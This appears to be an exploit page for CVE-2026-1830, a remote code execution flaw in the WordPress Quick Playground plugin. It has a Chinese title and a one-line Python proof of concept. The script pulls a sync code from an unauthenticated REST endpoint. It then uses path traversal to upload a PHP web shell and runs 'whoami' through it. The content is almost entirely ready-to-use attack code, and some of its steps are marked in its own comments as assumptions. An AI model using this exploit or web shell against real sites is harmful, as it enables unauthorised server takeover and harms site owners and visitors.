CVE-2026-1830 WordPress Quick Playground插件RCE漏洞

import requests # Target configuration target_url = "http://example.com" # Step 1: Retrieve the sync code from the vulnerable endpoint # The description mentions the endpoint exposes a sync code sync_endpoint = f"{target_url}/wp-json/quick-playground/v1/sync" try: response = requests.get(sync_endpoint) if response.status_code == 200: # Assuming the API returns JSON with the code or the code is in the response body sync_code = response.text.strip() print(f"[+] Sync code retrieved: {sync_code}") except Exception as e: print(f"[-] Failed to retrieve sync code: {e}") exit() # Step 2: Upload malicious PHP file using path traversal # The vulnerability allows arbitrary file upload via REST API without auth upload_endpoint = f"{target_url}/wp-json/quick-playground/v1/upload" # PHP code to execute system commands (webshell) php_payload = "<?php system($_GET['cmd']); ?>" # Data payload including the sync code and path traversal files = { 'file': ('shell.php', php_payload, 'application/x-php') } data = { 'sync_code': sync_code, # Path traversal to upload to a web-accessible directory 'path': '../../uploads/' } try: upload_response = requests.post(upload_endpoint, files=files, data=data) if upload_response.status_code == 200: print("[+] File uploaded successfully.") # Step 3: Execute the code (Verifying the exploit) shell_url = f"{target_url}/wp-content/uploads/shell.php?cmd=whoami" exec_response = requests.get(shell_url) if exec_response.status_code == 200: print(f"[+] RCE Successful! Output: {exec_response.text}") else: print("[-] Upload succeeded but execution failed.") else: print(f"[-] Upload failed. Status: {upload_response.status_code}") except Exception as e: print(f"[-] Error during exploitation: {e}")